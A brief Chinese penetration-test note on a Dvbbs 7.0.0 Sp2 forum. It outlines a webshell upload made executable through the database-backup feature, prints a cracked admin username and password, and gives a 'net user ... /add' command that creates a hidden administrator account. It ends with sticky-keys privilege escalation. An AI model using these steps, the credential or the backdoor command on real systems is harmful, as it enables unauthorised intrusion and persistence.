关于Dvbbs Version 7.0.0 Sp2渗透测试 #网络安全 #计算机安全

根据网上公开的漏洞方式，将上传的webshell的文件，通过后台的数据库备份功能转换成可执行的asp webshell/. 得到可疑数据库文件，下载下来，发现admin表，并解密，得到后台管理员账户admin，zsbkx1988. net user tangcai 123456 /add & net localgroup administrators tangcai/add. 发现做了一大堆并没啥卵用，马子里面的提权都无法提权，最终马子的用处只是知道了端口，到最后直接粘滞提权